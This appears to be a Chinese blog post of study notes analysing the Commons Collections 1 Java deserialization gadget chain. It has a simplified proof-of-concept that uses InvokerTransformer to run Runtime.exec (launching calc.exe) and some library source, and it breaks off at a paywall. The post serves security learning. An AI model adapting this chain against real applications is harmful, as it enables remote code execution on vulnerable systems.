p牛java安全漫谈学习笔记(3)_CommonsCollections1(cc1)分析

已于 2022-04-06 13:16:30 修改
阅读量4.2k 收藏 1
点赞数
分类专栏: java安全 文章标签: 网络安全
于 2022-04-06 12:28:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35976649/article/details/123986988
版权

文章目录

cc1链(jdk6)
简化cc1-仿

使用p牛的简化cc1进行分析:

package ysoserial.payloads;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.util.HashMap;
import java.util.Map;

public class cc1 {
    public static void main(String[] args) throws Exception {
        Transformer[] transformers = new Transformer[]{
            new ConstantTransformer(Runtime.getRuntime()),
            new InvokerTransformer("exec", new Class[]{String.class},
                new Object[]
                    {"C:\\Windows\\System32\\calc.exe"}),
        };
        Transformer transformerChain = new ChainedTransformer(transformers);
        Map innerMap = new HashMap();
        Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);
        outerMap.put("test", "xxxx");
    }
}

下断点进行debug:

请添加图片描述

一路f7发现漏洞点,excute确认漏洞所在

请添加图片描述

而此时的数据为字节流,于是反溯,可查看调用链:

请添加图片描述

TransformedMap.decorate用于把keyTransformer,valueTransformer定义进innerMap

Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);

keyTransformer,valueTransformer是继承了Transformer接口,用于处理新元素。

回到main中,定义了transformers

new Transformer[]{new ConstantTransformer(Runtime.getRuntime()),new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"C:\\Windows\\System32\\calc.exe"}),};

分别查看ConstantTransformer,InvokerTransformer。

ConstantTransformer的作用是构造函数时传入对象并在最后transform方法return这个对象。

InvokerTransformer的作用为rce源码如下:

public InvokerTransformer(String methodName, Class[] paramTypes, Object[] args) {
        this.iMethodName = methodName;
        this.iParamTypes = paramTypes;
        this.iArgs = args;
    }

    public Object transform(Object input) {
        if (input == null) {
            return nul
最低0.47元/天 解锁文章
error_404_1
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pjava安全漫谈学习笔记(2)_反序列化与urldns链(基础)
qq_35976649的博客
04-06 4312
关于反序列化 ysoserial下载分析地址:https://github.com/frohoff/ysoserial php反序列化主要是魔术方法,与java反序列化类似,主要是把对象进行json或者xml的序列化和反序列化。 php主要是可以控制对象的属性利用控制的对象的属性在后续代码中进行危险操作 java的话是因为很多反序列化的代码是由开发者进行开发的,再加上java的应用十分广泛,所以java的反序列化攻击面为最广的。 python的话p只提了一嘴,大致意思就是python反序列化是在执行基于栈
pjava安全漫谈学习笔记(1)_反射与RMI(基础)
qq_35976649的博客
04-06 4160
关于反射 获取类的⽅方法: forName 实例例化类对象的⽅方法: newInstance 获取函数的⽅方法: getMethod 执⾏行行函数的⽅方法: invoke public class TrainPrint { { System.out.printf("Empty block initial %s\n", this.getClass()); } static { System.out.printf("Static initial %s\n", TrainPrint.class); } publ
JavaThings:共享与Java相关的东西-Java安全漫谈笔记相关内容
02-06
JavaThings-Java安全漫谈笔记相关 《 Java安全漫谈》是我在写的一点Java学习相关的随笔,不是很严谨,也不是啥高科技。这个存储库主要是记录并整理一下,附加一些代码。 Java安全漫谈目录 人口统计 字节码: 远程字节码加载: 系统默认的defineClass加载字节码演示: 使用TemplatesImpl加载字节码演示: 使用BCEL加载字节码: 反序列化: 最简单的Transformer演示: 我简化的 ,更方便大家理解 利用TemplatesImpl构造的Transformer演示: 无InvokerTransformer的Transformer演示: 我
Java安全入门
Yb_140的博客
10-14 1358
Java安全入门
CC1分析与利用超详细
最新发布
2301_79700060的博客
06-27 976
主要的函数调用就是只是其中穿插了一些其他需要解决的问题。
JAVA安全JAVA服务器安全漫谈
swordheart的博客
04-25 1004
0x00 前言 本文主要针对JAVA服务器常见的危害较大的安全问题的成因与防护进行分析,主要为了交流和抛砖引玉。 0x01 任意文件下载 示例 以下为任意文件下载漏洞的示例。 DownloadAction为用于下载文件的servlet。 1 2 3 4 5 6 7 8 9 10 11 12 13 <code>#!html <servlet>
P神-Java安全漫谈
04-20
Java安全是指在Java编程和应用开发过程中采取的一系列措施,旨在保护Java应用程序、系统和数据免受恶意攻击、数据泄露和其他安全威胁的影响。Java安全主要涉及以下几个方面: 代码安全性:Java提供了强大的安全机制...
Java安全漫谈 - 03.反射篇(3)1
08-03
Java安全漫谈 - 反射篇(3)深入讲解了如何在Java中通过反射机制处理可变长参数和访问私有方法。反射是Java中一个强大的特性,它允许程序在运行时检查和操作类、接口、字段和方法,极大地增强了代码的灵活性。然而,这...
Java安全漫谈 - 05.RMI篇(2)1
08-03
原因是,通常我们在新建一个RMI Registry的时候,都会直接绑定一个对象在上面,也就是说我们示例代码中的Server其实包含了Registry和Serve
Java安全漫谈 - 01.反射篇(1)1
08-03
Java 反射机制安全漫谈 Java 反射机制是 Java 语言中的一种强大功能,允许程序在运行时访问和修改类的信息。然而,这种功能也引入了安全隐患。本文将讨论 Java 反射机制的安全问题,重点介绍反射机制的基本概念、...
Java安全漫谈 - 07.反序列化篇(1)1
08-03
Java安全领域中的反序列化漏洞是一个重要的议题,它涉及的是将对象从二进制数据恢复为程序可以理解的形式时可能存在的安全隐患。反序列化是序列化过程的逆向操作,序列化是将对象的状态转换为可存储或可传输的数据...
Java安全漫谈 - 02.反射篇(2)1
08-03
不过,我们有时候在写漏洞利用方法的时候,会发现使用 newInstance 总是不成功,这时候原因可能是:1. 你使用的类没有无参构造函数2. 你使用的类构造函
Java 安全研究初探
有价值炮灰
04-03 248
Java 安全,通常指代的是 Java Web 安全。在刚开始学习的一段时间里,面对众多的框架和名词,比如 Spring、Weblogic、EJB、AKB,等等,总感觉狗啃泰山无从下嘴。于是就有了这篇文章,旨在记录学习过程中遇到的所有问题,希望也能对像我一样的初学者有所帮助。
Spring Cloud Gateway SPEL RCE复现
HongYu012的博客
03-05 1157
目录 0 环境搭建 影响范围: Spring Cloud Gateway 3.1.x < 3.1.1 Spring Cloud Gateway < 3.0.7 p的vulhub已经搭好docker了,vulhub/spring/CVE-2022-22947 at master · vulhub/vulhub · GitHub 也可以本地搭建 git clone https://github.com/spring-cloud/spring-cloud-gateway cd sp.
Java安全漫谈 - 06.RMI篇(3)
离别歌
10-14 941
这是代码审计知识星球中Java安全的第六篇文章上一篇我们详细说了如何利用codebase来加载远程类,在RMI服务端执行任意代码。那么,从原理上来讲,codebase究竟是如何传递进而被...
JAVA安全漫谈1-8笔记
wfz2333的博客
04-06 1152
classloader就是java的类加载器,告诉虚拟机如何加载这个类。默认情况下根据类名来加载类,类名必须是完整路径{}括号里的是初始化块,这里面的代码在创建java对象时执行,而且在构造器之前执行!其实初始化块就是构造器的补充,初始化快是不能接收任何参数的,定义的一些所有对象共有的属性、方法等内容时就可以用初始化块了初始化!好处是可以提高初始化块的复用,提高整个应用的可维护性。
Java安全性(通过故事来学习
pcaidong_2的专栏
04-29 111
开发人员可以使用这个系统来定义程序的安全策略,比如哪些类可以被加载和执行,哪些资源可以被访问等等。这种细粒度的安全控制可以保证程序仅仅执行它被允许的操作。有一天,他写了一个非常重要的程序,用来处理公司的财务数据。最后,Java还有一个内置的安全管理器,可以监控程序的行为并防止它们对系统造成损害。首先,Java有一个非常严格的安全模型,它可以限制代码对操作系统和硬件的访问。小明非常担心他的程序被黑客入侵,于是他开始了解Java安全性。他惊奇地发现,Java有许多内置的安全机制,可以确保程序运行时的安全性。
Java安全第一篇 | 反射看这一篇就够了
weixin_48202759的博客
03-21 3579
什么是反射? 文章首发个人公众号 《小艾搞安全Java安全可以从反序列化漏洞说起,反序列化漏洞又可以从反射说起。反射是⼤多数语⾔⾥都必不可少的组成部分,对象可以通过反射获取他的类,类可以通过反射拿到所有⽅法(包括私有),拿到的⽅法可以调⽤,总之通过“反射”,我们可以将Java这种静态语⾔附加上动态特性。可能说完这一两句话大家还是不知道反射是个啥玩意,现在为了让大家容易理解,先为大家提出一个需求,通过这个需要来引出反射。需求如下: 根据配置文件re.properties指定信息,创建对象并调用方法。 cl
Java安全--篇1-反射
qq_64201116的博客
11-13 790
看了好多文章,一直没搞懂反射是什么,然后闲着无聊搜了视频,一看就懂了好多,这里浅说一下。很多顺序是跟着P神的文章走的,把自己看不懂的百度出来记录一下。
java安全漫谈pdf
01-29
Java安全漫谈是一本关于Java安全的书籍,深入探讨了Java应用程序在网络环境中的安全性和相关的安全漏洞。该书内容涵盖了Java安全基础、Java虚拟机的安全机制、Java安全管理、Java安全开发等方面的知识。 首先,Java安全基础部分介绍了Java安全模型的原理和特点,包括Java类库的安全特性、权限管理和访问控制、安全策略配置等。这部分内容可帮助开发人员了解Java应用程序的安全需求,并提供相应的解决方案。 其次,Java虚拟机的安全机制是Java应用程序的基石。该书介绍了Java虚拟机的安全沙箱和类加载机制,并讨论了如何利用这些安全机制避免恶意代码的执行和隐患的防范。 此外,Java安全管理部分从用户角度出发,介绍了Java应用程序的安全管理工具和技术,如Java安全策略文件、权限管理和安全认证等。开发人员可以通过合理配置和使用这些工具来提高Java应用程序的安全性。 最后,该书还涉及了Java安全开发过程中的一些最佳实践和常见安全漏洞,如输入验证、跨站脚本攻击(XSS)、SQL注入、跨站请求伪造(CSRF)等。通过学习和掌握这些知识,开发人员可以编写出更加安全Java应用程序。 总而言之,Java安全漫谈是一本全面讨论Java安全的书籍,内容涵盖了Java安全基础、Java虚拟机的安全机制、Java安全管理和Java安全开发等方面的知识。它对于开发人员和安全从业人员来说,都是一本重要的参考书,有助于提高Java应用程序的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值